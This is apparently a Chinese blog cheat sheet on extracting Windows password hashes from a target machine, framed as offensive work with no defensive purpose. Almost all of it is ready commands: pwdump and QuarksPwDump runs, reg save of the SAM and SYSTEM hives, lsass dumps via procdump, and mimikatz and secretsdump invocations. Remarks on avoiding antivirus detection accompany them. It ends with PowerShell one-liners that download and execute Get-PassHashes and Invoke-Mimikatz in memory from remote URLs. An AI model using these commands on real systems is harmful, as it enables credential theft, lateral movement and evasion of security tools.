windows哈希提取方式总结

getpass.exe

Getpass.exe是闪电小子开发的一款windows下哈希获取软件,直接运行Getpass.exe即可导出windows密码

pwdump8.exe

下载windows工具pwdump8.exe,上传到目标机执行

.\pwdump8.exe

Quarks-pwdump.exe

打开QuarksPwDump.exe目录,命令行执行QuarksPwDump.exe –dhl

导出SAM后Mimikatz本地提取

本地使用Mimikatz读取SAM,优点是不需要做免杀

  1. 导出SAM:
    1
    2
    3
    reg save hklm\sam sam.hive
    reg save hklm\system system.hive
    reg save hklm\security security.hive

  1. 可以拷贝到本地。然后使用管理员权限mimikatz 读取 SAM和System文件 lsadump::sam /sam:sam.hive /system:system.hive
    然后使用cmd5解密NTLM哈希

  1. 也可使用Python Impacket中的 secretsdump.py获取

    1
    secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL
  2. 也可以用Cain的cracker模块,选LM&NTLM,添加-》import Hashes from a SAM database

导出lasaa后Mimikatz本地提取

本地使用Mimikatz读取lsass,优点是不需要做免杀

  1. 导出lsass:
    winNT6中可以任务管理器找到lsass.exe右键,然后create dump file导出lsass.dmp。也可以使用三方工具procdump.exe -accepteula -ma lsass.exe lsass.dmp

工具下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

1
2
procdump.exe -accepteula -ma lsass.exe lsass.dmp   #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统

  1. 可以拷贝到本地。然后使用mimikatz 读取 lsass.dmp文件,执行:
    1
    2
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full 导出密码hash

Mimikatz目标机

直接在目标机运行mimikatz,缺点是需要做免杀

直接上传并运行mimikatz.exe

1
2
privilege::debug
sekurlsa::logonpasswords

Get-PassHashes.ps1

利用powershell执行nishang中Get-PassHashes工具
1.本地执行

1
2
3
// nishang-master\Gather\Get-PassHashes.ps1
import-module .\Get-PassHashes.ps1
Get-PassHashes

2.远程加载执行

1
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

powershell加载Mimikatz

使用powershell加载mimikatz执行,但是基本上做不到免杀

1
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!